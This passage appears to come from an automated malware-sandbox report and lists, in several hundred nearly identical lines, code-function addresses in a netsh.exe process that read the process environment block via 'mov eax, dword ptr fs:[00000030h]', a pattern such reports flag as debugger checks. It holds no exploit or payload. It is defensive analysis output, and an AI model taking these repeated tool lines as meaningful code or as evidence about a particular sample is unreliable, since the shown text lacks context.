Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D720A0 mov eax, dword ptr fs:[00000030h]		15_2_00D720A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D720A0 mov eax, dword ptr fs:[00000030h]		15_2_00D720A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D720A0 mov eax, dword ptr fs:[00000030h]		15_2_00D720A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D720A0 mov eax, dword ptr fs:[00000030h]		15_2_00D720A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D720A0 mov eax, dword ptr fs:[00000030h]		15_2_00D720A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D720A0 mov eax, dword ptr fs:[00000030h]		15_2_00D720A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D60050 mov eax, dword ptr fs:[00000030h]		15_2_00D60050
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D60050 mov eax, dword ptr fs:[00000030h]		15_2_00D60050
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDC450 mov eax, dword ptr fs:[00000030h]		15_2_00DDC450
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDC450 mov eax, dword ptr fs:[00000030h]		15_2_00DDC450
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E02073 mov eax, dword ptr fs:[00000030h]		15_2_00E02073
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E11074 mov eax, dword ptr fs:[00000030h]		15_2_00E11074
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7A44B mov eax, dword ptr fs:[00000030h]		15_2_00D7A44B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6746D mov eax, dword ptr fs:[00000030h]		15_2_00D6746D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC7016 mov eax, dword ptr fs:[00000030h]		15_2_00DC7016
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC7016 mov eax, dword ptr fs:[00000030h]		15_2_00DC7016
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC7016 mov eax, dword ptr fs:[00000030h]		15_2_00DC7016
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6C0A mov eax, dword ptr fs:[00000030h]		15_2_00DC6C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6C0A mov eax, dword ptr fs:[00000030h]		15_2_00DC6C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6C0A mov eax, dword ptr fs:[00000030h]		15_2_00DC6C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6C0A mov eax, dword ptr fs:[00000030h]		15_2_00DC6C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h]		15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E1740D mov eax, dword ptr fs:[00000030h]		15_2_00E1740D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E1740D mov eax, dword ptr fs:[00000030h]		15_2_00E1740D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E1740D mov eax, dword ptr fs:[00000030h]		15_2_00E1740D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E14015 mov eax, dword ptr fs:[00000030h]		15_2_00E14015
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E14015 mov eax, dword ptr fs:[00000030h]		15_2_00E14015
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7002D mov eax, dword ptr fs:[00000030h]		15_2_00D7002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7002D mov eax, dword ptr fs:[00000030h]		15_2_00D7002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7002D mov eax, dword ptr fs:[00000030h]		15_2_00D7002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7002D mov eax, dword ptr fs:[00000030h]		15_2_00D7002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7002D mov eax, dword ptr fs:[00000030h]		15_2_00D7002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7BC2C mov eax, dword ptr fs:[00000030h]		15_2_00D7BC2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5B02A mov eax, dword ptr fs:[00000030h]		15_2_00D5B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5B02A mov eax, dword ptr fs:[00000030h]		15_2_00D5B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5B02A mov eax, dword ptr fs:[00000030h]		15_2_00D5B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5B02A mov eax, dword ptr fs:[00000030h]		15_2_00D5B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E0FDE2 mov eax, dword ptr fs:[00000030h]		15_2_00E0FDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E0FDE2 mov eax, dword ptr fs:[00000030h]		15_2_00E0FDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E0FDE2 mov eax, dword ptr fs:[00000030h]		15_2_00E0FDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E0FDE2 mov eax, dword ptr fs:[00000030h]		15_2_00E0FDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h]		15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h]		15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h]		15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6DC9 mov ecx, dword ptr fs:[00000030h]		15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h]		15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h]		15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DF8DF1 mov eax, dword ptr fs:[00000030h]		15_2_00DF8DF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4B1E1 mov eax, dword ptr fs:[00000030h]		15_2_00D4B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4B1E1 mov eax, dword ptr fs:[00000030h]		15_2_00D4B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4B1E1 mov eax, dword ptr fs:[00000030h]		15_2_00D4B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DD41E8 mov eax, dword ptr fs:[00000030h]		15_2_00DD41E8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5D5E0 mov eax, dword ptr fs:[00000030h]		15_2_00D5D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5D5E0 mov eax, dword ptr fs:[00000030h]		15_2_00D5D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D72990 mov eax, dword ptr fs:[00000030h]		15_2_00D72990
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7FD9B mov eax, dword ptr fs:[00000030h]		15_2_00D7FD9B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7FD9B mov eax, dword ptr fs:[00000030h]		15_2_00D7FD9B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E105AC mov eax, dword ptr fs:[00000030h]		15_2_00E105AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E105AC mov eax, dword ptr fs:[00000030h]		15_2_00E105AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7A185 mov eax, dword ptr fs:[00000030h]		15_2_00D7A185
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6C182 mov eax, dword ptr fs:[00000030h]		15_2_00D6C182
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D72581 mov eax, dword ptr fs:[00000030h]		15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D72581 mov eax, dword ptr fs:[00000030h]		15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D72581 mov eax, dword ptr fs:[00000030h]		15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D72581 mov eax, dword ptr fs:[00000030h]		15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h]		15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h]		15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h]		15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h]		15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h]		15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D71DB5 mov eax, dword ptr fs:[00000030h]		15_2_00D71DB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D71DB5 mov eax, dword ptr fs:[00000030h]		15_2_00D71DB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D71DB5 mov eax, dword ptr fs:[00000030h]		15_2_00D71DB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC51BE mov eax, dword ptr fs:[00000030h]		15_2_00DC51BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC51BE mov eax, dword ptr fs:[00000030h]		15_2_00DC51BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC51BE mov eax, dword ptr fs:[00000030h]		15_2_00DC51BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC51BE mov eax, dword ptr fs:[00000030h]		15_2_00DC51BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D735A1 mov eax, dword ptr fs:[00000030h]		15_2_00D735A1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D761A0 mov eax, dword ptr fs:[00000030h]		15_2_00D761A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D761A0 mov eax, dword ptr fs:[00000030h]		15_2_00D761A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC69A6 mov eax, dword ptr fs:[00000030h]		15_2_00DC69A6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D67D50 mov eax, dword ptr fs:[00000030h]		15_2_00D67D50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6B944 mov eax, dword ptr fs:[00000030h]		15_2_00D6B944
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6B944 mov eax, dword ptr fs:[00000030h]		15_2_00D6B944
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D83D43 mov eax, dword ptr fs:[00000030h]		15_2_00D83D43
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC3540 mov eax, dword ptr fs:[00000030h]		15_2_00DC3540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6C577 mov eax, dword ptr fs:[00000030h]		15_2_00D6C577
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6C577 mov eax, dword ptr fs:[00000030h]		15_2_00D6C577
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4B171 mov eax, dword ptr fs:[00000030h]		15_2_00D4B171
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4B171 mov eax, dword ptr fs:[00000030h]		15_2_00D4B171
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4C962 mov eax, dword ptr fs:[00000030h]		15_2_00D4C962
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D49100 mov eax, dword ptr fs:[00000030h]		15_2_00D49100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D49100 mov eax, dword ptr fs:[00000030h]		15_2_00D49100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D49100 mov eax, dword ptr fs:[00000030h]		15_2_00D49100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E18D34 mov eax, dword ptr fs:[00000030h]		15_2_00E18D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h]		15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4AD30 mov eax, dword ptr fs:[00000030h]		15_2_00D4AD30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DCA537 mov eax, dword ptr fs:[00000030h]		15_2_00DCA537
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D74D3B mov eax, dword ptr fs:[00000030h]		15_2_00D74D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D74D3B mov eax, dword ptr fs:[00000030h]		15_2_00D74D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D74D3B mov eax, dword ptr fs:[00000030h]		15_2_00D74D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7513A mov eax, dword ptr fs:[00000030h]		15_2_00D7513A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7513A mov eax, dword ptr fs:[00000030h]		15_2_00D7513A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D64120 mov eax, dword ptr fs:[00000030h]		15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D64120 mov eax, dword ptr fs:[00000030h]		15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D64120 mov eax, dword ptr fs:[00000030h]		15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D64120 mov eax, dword ptr fs:[00000030h]		15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D64120 mov ecx, dword ptr fs:[00000030h]		15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D736CC mov eax, dword ptr fs:[00000030h]		15_2_00D736CC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D72ACB mov eax, dword ptr fs:[00000030h]		15_2_00D72ACB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DFFEC0 mov eax, dword ptr fs:[00000030h]		15_2_00DFFEC0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D88EC7 mov eax, dword ptr fs:[00000030h]		15_2_00D88EC7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D72AE4 mov eax, dword ptr fs:[00000030h]		15_2_00D72AE4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D716E0 mov ecx, dword ptr fs:[00000030h]		15_2_00D716E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E18ED6 mov eax, dword ptr fs:[00000030h]		15_2_00E18ED6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D576E2 mov eax, dword ptr fs:[00000030h]		15_2_00D576E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7D294 mov eax, dword ptr fs:[00000030h]		15_2_00D7D294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7D294 mov eax, dword ptr fs:[00000030h]		15_2_00D7D294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E10EA5 mov eax, dword ptr fs:[00000030h]		15_2_00E10EA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E10EA5 mov eax, dword ptr fs:[00000030h]		15_2_00E10EA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E10EA5 mov eax, dword ptr fs:[00000030h]		15_2_00E10EA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDFE87 mov eax, dword ptr fs:[00000030h]		15_2_00DDFE87
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5AAB0 mov eax, dword ptr fs:[00000030h]		15_2_00D5AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5AAB0 mov eax, dword ptr fs:[00000030h]		15_2_00D5AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7FAB0 mov eax, dword ptr fs:[00000030h]		15_2_00D7FAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h]		15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h]		15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h]		15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h]		15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h]		15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC46A7 mov eax, dword ptr fs:[00000030h]		15_2_00DC46A7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E18A62 mov eax, dword ptr fs:[00000030h]		15_2_00E18A62
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DD4257 mov eax, dword ptr fs:[00000030h]		15_2_00DD4257
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D49240 mov eax, dword ptr fs:[00000030h]		15_2_00D49240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D49240 mov eax, dword ptr fs:[00000030h]		15_2_00D49240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D49240 mov eax, dword ptr fs:[00000030h]		15_2_00D49240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D49240 mov eax, dword ptr fs:[00000030h]		15_2_00D49240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h]		15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h]		15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h]		15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h]		15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h]		15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h]		15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D8927A mov eax, dword ptr fs:[00000030h]		15_2_00D8927A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h]		15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h]		15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h]		15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h]		15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h]		15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E0EA55 mov eax, dword ptr fs:[00000030h]		15_2_00E0EA55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5766D mov eax, dword ptr fs:[00000030h]		15_2_00D5766D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DFB260 mov eax, dword ptr fs:[00000030h]		15_2_00DFB260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DFB260 mov eax, dword ptr fs:[00000030h]		15_2_00DFB260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4AA16 mov eax, dword ptr fs:[00000030h]		15_2_00D4AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4AA16 mov eax, dword ptr fs:[00000030h]		15_2_00D4AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D45210 mov eax, dword ptr fs:[00000030h]		15_2_00D45210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D45210 mov ecx, dword ptr fs:[00000030h]		15_2_00D45210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D45210 mov eax, dword ptr fs:[00000030h]		15_2_00D45210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D45210 mov eax, dword ptr fs:[00000030h]		15_2_00D45210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D63A1C mov eax, dword ptr fs:[00000030h]		15_2_00D63A1C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7A61C mov eax, dword ptr fs:[00000030h]		15_2_00D7A61C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7A61C mov eax, dword ptr fs:[00000030h]		15_2_00D7A61C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4C600 mov eax, dword ptr fs:[00000030h]		15_2_00D4C600
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4C600 mov eax, dword ptr fs:[00000030h]		15_2_00D4C600
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4C600 mov eax, dword ptr fs:[00000030h]		15_2_00D4C600
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D78E00 mov eax, dword ptr fs:[00000030h]		15_2_00D78E00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D58A0A mov eax, dword ptr fs:[00000030h]		15_2_00D58A0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DFFE3F mov eax, dword ptr fs:[00000030h]		15_2_00DFFE3F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01608 mov eax, dword ptr fs:[00000030h]		15_2_00E01608
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4E620 mov eax, dword ptr fs:[00000030h]		15_2_00D4E620
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D84A2C mov eax, dword ptr fs:[00000030h]		15_2_00D84A2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D84A2C mov eax, dword ptr fs:[00000030h]		15_2_00D84A2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC53CA mov eax, dword ptr fs:[00000030h]		15_2_00DC53CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC53CA mov eax, dword ptr fs:[00000030h]		15_2_00DC53CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D837F5 mov eax, dword ptr fs:[00000030h]		15_2_00D837F5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h]		15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h]		15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h]		15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h]		15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h]		15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h]		15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6DBE9 mov eax, dword ptr fs:[00000030h]		15_2_00D6DBE9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D72397 mov eax, dword ptr fs:[00000030h]		15_2_00D72397
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D58794 mov eax, dword ptr fs:[00000030h]		15_2_00D58794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E15BA5 mov eax, dword ptr fs:[00000030h]		15_2_00E15BA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7B390 mov eax, dword ptr fs:[00000030h]		15_2_00D7B390
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC7794 mov eax, dword ptr fs:[00000030h]		15_2_00DC7794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC7794 mov eax, dword ptr fs:[00000030h]		15_2_00DC7794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC7794 mov eax, dword ptr fs:[00000030h]		15_2_00DC7794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D51B8F mov eax, dword ptr fs:[00000030h]		15_2_00D51B8F
